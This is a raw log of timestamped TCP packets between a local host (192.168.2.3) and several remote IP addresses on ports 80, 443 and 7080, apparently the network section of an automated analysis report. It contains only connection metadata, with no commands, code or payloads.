Nov 13, 2022 19:28:00.888103962 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:00.889678955 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:01.129973888 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:01.130215883 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:01.368962049 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:01.369247913 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:01.618293047 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:01.620057106 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:01.620259047 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:01.620259047 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:02.357400894 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:02.357584000 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:03.589106083 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:03.589205980 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:03.830061913 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:03.830157995 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:04.003448009 CET	49710	7080	192.168.2.3	45.63.99.23
Nov 13, 2022 19:28:04.076771021 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:04.076967955 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:04.326586962 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:04.326869965 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:04.576941967 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:04.577119112 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:04.823900938 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:04.824376106 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:05.070880890 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:05.072485924 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:05.333992004 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:05.334192038 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:05.606771946 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:05.606890917 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:05.875149012 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:05.875344992 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:06.049235106 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:06.049359083 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:06.306000948 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:06.306061983 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:06.306119919 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:06.306175947 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:06.569889069 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:06.570019007 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:06.570036888 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:06.570063114 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:06.570091009 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:06.570106983 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:06.570108891 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:06.570161104 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:06.836879015 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:06.836963892 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:07.112979889 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:07.113043070 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:07.113076925 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:07.113147020 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:07.376321077 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:07.376389027 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:07.376637936 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:07.391952991 CET	49712	443	192.168.2.3	182.162.143.56
Nov 13, 2022 19:28:07.392034054 CET	443	49712	182.162.143.56	192.168.2.3
Nov 13, 2022 19:28:07.392239094 CET	49712	443	192.168.2.3	182.162.143.56
Nov 13, 2022 19:28:07.393161058 CET	49712	443	192.168.2.3	182.162.143.56
Nov 13, 2022 19:28:07.393207073 CET	443	49712	182.162.143.56	192.168.2.3
Nov 13, 2022 19:28:07.651961088 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:07.652025938 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:07.652060986 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:07.652148962 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:07.920417070 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:07.920481920 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:07.920659065 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:07.920660019 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:08.172959089 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:08.173017979 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:08.173062086 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:08.173131943 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:08.173209906 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:08.173367977 CET	443	49712	182.162.143.56	192.168.2.3
Nov 13, 2022 19:28:08.173532009 CET	49712	443	192.168.2.3	182.162.143.56
Nov 13, 2022 19:28:08.176942110 CET	49712	443	192.168.2.3	182.162.143.56
Nov 13, 2022 19:28:08.176973104 CET	443	49712	182.162.143.56	192.168.2.3
Nov 13, 2022 19:28:08.177426100 CET	443	49712	182.162.143.56	192.168.2.3
Nov 13, 2022 19:28:08.218775988 CET	49712	443	192.168.2.3	182.162.143.56
Nov 13, 2022 19:28:08.536531925 CET	49712	443	192.168.2.3	182.162.143.56
Nov 13, 2022 19:28:08.536614895 CET	443	49712	182.162.143.56	192.168.2.3
Nov 13, 2022 19:28:08.536668062 CET	49712	443	192.168.2.3	182.162.143.56
Nov 13, 2022 19:28:08.536689043 CET	443	49712	182.162.143.56	192.168.2.3
Nov 13, 2022 19:28:08.909161091 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:08.909410954 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:09.164314985 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:09.164403915 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:09.164485931 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:09.164537907 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:09.410284996 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:09.410396099 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:09.648941040 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:09.649038076 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:09.894017935 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:09.894113064 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:10.145483971 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:10.145646095 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:10.332184076 CET	443	49712	182.162.143.56	192.168.2.3
Nov 13, 2022 19:28:10.332355022 CET	443	49712	182.162.143.56	192.168.2.3
Nov 13, 2022 19:28:10.332528114 CET	49712	443	192.168.2.3	182.162.143.56
Nov 13, 2022 19:28:10.336491108 CET	49712	443	192.168.2.3	182.162.143.56
Nov 13, 2022 19:28:10.336546898 CET	443	49712	182.162.143.56	192.168.2.3
Nov 13, 2022 19:28:10.336581945 CET	49712	443	192.168.2.3	182.162.143.56
Nov 13, 2022 19:28:10.336600065 CET	443	49712	182.162.143.56	192.168.2.3
Nov 13, 2022 19:28:10.384414911 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:10.384500980 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:10.622996092 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:10.623209953 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:10.861908913 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:10.862243891 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:11.100877047 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:11.100944042 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:11.101223946 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:11.101223946 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:11.342200041 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:11.342261076 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:11.342278004 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:11.342473984 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:11.582783937 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:11.582940102 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:11.583028078 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:11.583134890 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:11.583237886 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:11.830265999 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:11.830342054 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:11.830395937 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:11.830414057 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:11.830468893 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:11.830497980 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:11.830571890 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:12.070482969 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:12.070554018 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:12.070806026 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:12.309632063 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:12.309689999 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:12.309731007 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:12.309799910 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:12.309906960 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:12.552056074 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:12.552172899 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:12.552179098 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:12.552228928 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:12.552243948 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:12.552273989 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:12.792311907 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:12.792397022 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:12.999713898 CET	49713	443	192.168.2.3	182.162.143.56
Nov 13, 2022 19:28:12.999797106 CET	443	49713	182.162.143.56	192.168.2.3
Nov 13, 2022 19:28:12.999923944 CET	49713	443	192.168.2.3	182.162.143.56
Nov 13, 2022 19:28:13.000662088 CET	49713	443	192.168.2.3	182.162.143.56
Nov 13, 2022 19:28:13.000694990 CET	443	49713	182.162.143.56	192.168.2.3
Nov 13, 2022 19:28:13.033094883 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:13.033185005 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:13.280194044 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:13.280314922 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:13.792407990 CET	443	49713	182.162.143.56	192.168.2.3
Nov 13, 2022 19:28:13.792712927 CET	49713	443	192.168.2.3	182.162.143.56
Nov 13, 2022 19:28:13.797019958 CET	49713	443	192.168.2.3	182.162.143.56
Nov 13, 2022 19:28:13.797050953 CET	443	49713	182.162.143.56	192.168.2.3
Nov 13, 2022 19:28:13.797789097 CET	443	49713	182.162.143.56	192.168.2.3
Nov 13, 2022 19:28:13.838283062 CET	49713	443	192.168.2.3	182.162.143.56
Nov 13, 2022 19:28:13.973238945 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:13.975428104 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:14.125853062 CET	49713	443	192.168.2.3	182.162.143.56
Nov 13, 2022 19:28:14.125853062 CET	49713	443	192.168.2.3	182.162.143.56
Nov 13, 2022 19:28:14.125953913 CET	443	49713	182.162.143.56	192.168.2.3
Nov 13, 2022 19:28:14.125992060 CET	443	49713	182.162.143.56	192.168.2.3
Nov 13, 2022 19:28:14.232007027 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:14.232043982 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:14.232134104 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:14.232206106 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:14.493412018 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:14.493474960 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:14.493558884 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:14.493576050 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:14.493603945 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:14.493628025 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:14.744546890 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:14.744615078 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:14.744801044 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:15.019556999 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:15.019736052 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:15.285571098 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:15.285792112 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:15.286035061 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:15.286115885 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:15.543070078 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:15.543160915 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:15.690449953 CET	443	49713	182.162.143.56	192.168.2.3
Nov 13, 2022 19:28:15.690624952 CET	443	49713	182.162.143.56	192.168.2.3
Nov 13, 2022 19:28:15.690965891 CET	49713	443	192.168.2.3	182.162.143.56
Nov 13, 2022 19:28:15.692446947 CET	49713	443	192.168.2.3	182.162.143.56
Nov 13, 2022 19:28:15.692490101 CET	443	49713	182.162.143.56	192.168.2.3
Nov 13, 2022 19:28:15.692522049 CET	49713	443	192.168.2.3	182.162.143.56
Nov 13, 2022 19:28:15.692538977 CET	443	49713	182.162.143.56	192.168.2.3
Nov 13, 2022 19:28:15.792375088 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:15.792457104 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:16.491070032 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:16.493514061 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:16.733618975 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:16.736385107 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:16.976257086 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:16.976521969 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:17.219655991 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:17.221554995 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:17.471190929 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:17.471396923 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:17.722354889 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:17.722636938 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:17.988209009 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:17.988270044 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:17.988578081 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:17.988832951 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:18.716125965 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:18.716219902 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:18.974445105 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:18.974579096 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:19.691230059 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:19.691560030 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:19.930668116 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:19.930736065 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:19.930912971 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:19.933167934 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:20.180762053 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:20.180953026 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:20.428704977 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:20.434092999 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:21.585478067 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:21.585571051 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:21.848093033 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:21.848211050 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:21.848221064 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:21.848273993 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:22.098897934 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:22.099020004 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:22.099061012 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:22.099093914 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:22.801043034 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:22.801297903 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:24.401171923 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:24.401269913 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:36.051343918 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:28:36.244518042 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:28:37.328949928 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:37.329080105 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:37.570262909 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:37.570357084 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:37.570543051 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:37.812585115 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:37.815160990 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:38.058516026 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:38.059185028 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:38.298388004 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:38.299201965 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:38.510270119 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:38.511236906 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:39.200208902 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:39.201795101 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:39.448697090 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:39.448740959 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:39.448781013 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:39.448795080 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:39.448848009 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:39.691276073 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:39.691369057 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:40.381109953 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:40.381489992 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:40.620235920 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:40.620387077 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:42.203227997 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:42.203346014 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:44.233356953 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:44.235832930 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:44.480984926 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:44.481050014 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:44.481097937 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:44.481316090 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:44.481400967 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:44.730433941 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:44.730496883 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:44.730530977 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:44.730745077 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:44.977709055 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:44.977771044 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:44.977890968 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:44.977969885 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:45.663295984 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:45.663403034 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:45.902053118 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:45.902153969 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:46.593025923 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:46.593317986 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:46.861385107 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:46.861459017 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:46.861596107 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:46.861671925 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:47.113610983 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:47.113686085 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:47.113722086 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:47.113960981 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:47.360351086 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:47.360419989 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:47.360455036 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:47.360625982 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:47.611223936 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:47.611289978 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:47.611542940 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:47.866131067 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:47.866195917 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:47.866466999 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:48.139698982 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:48.139935017 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:48.415570021 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:48.415666103 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:49.137972116 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:49.138243914 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:49.397135019 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:49.397202015 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:49.397249937 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:49.397310019 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:49.397382975 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:49.645258904 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:49.645328045 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:49.645363092 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:49.645582914 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:49.885139942 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:49.885204077 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:49.885246992 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:49.885292053 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:49.885382891 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:49.885472059 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:50.128485918 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:50.128554106 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:50.128747940 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:50.820230961 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:50.820314884 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:51.061682940 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:51.061800957 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:51.300446987 CET	80	49703	81.68.152.197	192.168.2.3
